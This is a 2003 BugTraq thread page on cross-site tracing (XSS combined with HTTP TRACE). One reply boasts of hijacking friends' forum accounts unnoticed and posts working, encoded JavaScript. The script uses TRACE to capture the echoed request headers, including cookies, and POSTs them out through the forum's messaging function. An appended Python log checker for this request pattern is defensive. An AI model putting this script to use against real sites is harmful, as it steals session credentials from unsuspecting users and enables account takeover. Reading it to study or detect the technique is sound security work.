BugTraq
RE: TRACE used to increase the dangerous of XSS. Jan 23 2003 09:10AM
Thor Larholm (thor pivx com) (2 replies)
Re: TRACE used to increase the dangerous of XSS. Jan 24 2003 01:08AM
Phrack (security fooyu com)
It's really a terrible security hole. Using this method, I have hacked some BBS accounts of my friends. If you do it properly, it wouldn't be noticed by the victim. The following is my code:

<script type="text/javascript">

function xssDomainTraceRequest(){

var exampleCode = "var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\")\;xmlHttp.open(\"TRACE\",\"http://bbs.for.bar\",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;xmlHttp.open(\"POST\",\"http://bbs.for.bar/member.php\",false)\;xmlHttp.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\")\;xmlHttp.send(\"s=&action=emailmessage&userid=11111&subject=test&message=\" + xmlDoc)\;";

var target = "http://bbs.for.bar";

cExampleCode = encodeURIComponent(exampleCode + ';top.close()');

var readyCode = 'font-size:expression(execScript(decodeURIComponent("' + cExampleCode + '")))';

showModalDialog(target, null, readyCode);

}

</script>

<script>

xssDomainTraceRequest();

</script>

Chen haiyan, CISSP

System Security Engineer

HENAN CFONLINE COMMERCE CO., LTD.
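
Added example, not part of the original post or thread: a log check for the request pattern the posted script produces, namely a TRACE that the server answers, followed by a POST from the same client. The Common Log Format input, the sample lines, the 5-second window and the inclusion of TRACK are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample access-log lines (Common Log Format); hosts, paths, times are made up.
SAMPLE_LOG = """\
198.51.100.7 - - [24/Jan/2003:01:02:03 +0000] "GET /index.php HTTP/1.1" 200 5120
198.51.100.7 - - [24/Jan/2003:01:02:10 +0000] "TRACE / HTTP/1.1" 200 412
198.51.100.7 - - [24/Jan/2003:01:02:11 +0000] "POST /member.php HTTP/1.1" 200 230
203.0.113.9 - - [24/Jan/2003:01:05:00 +0000] "POST /member.php HTTP/1.1" 200 230
203.0.113.20 - - [24/Jan/2003:01:06:00 +0000] "TRACE / HTTP/1.1" 405 0
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
WINDOW = timedelta(seconds=5)  # assumed pairing window; tune for your site


def find_trace_activity(log_text, window=WINDOW):
    """Return (answered, pairs): TRACE/TRACK requests the server answered 2xx,
    and the POSTs that followed one from the same client within `window`."""
    answered, pairs, last_trace = [], [], {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, ts, method, path, status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        if method in ("TRACE", "TRACK"):
            if status.startswith("2"):  # server echoed the request back
                answered.append((client, ts, path))
                last_trace[client] = when
        elif method == "POST" and client in last_trace:
            if when - last_trace[client] <= window:
                pairs.append((client, path, ts))
            del last_trace[client]  # only pair the first POST after a TRACE
    return answered, pairs


if __name__ == "__main__":
    answered, pairs = find_trace_activity(SAMPLE_LOG)
    for client, ts, path in answered:
        print(f"TRACE answered: {client} {path} at {ts}")
    for client, path, ts in pairs:
        print(f"TRACE then POST: {client} -> {path} at {ts}")
```

Any entry in the first list means the server still answers TRACE; a rejected request (the 405 line) is ignored.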

Re: TRACE used to increase the dangerous of XSS. Jan 23 2003 08:28PM
Peter Watkins (peterw usa net)


 
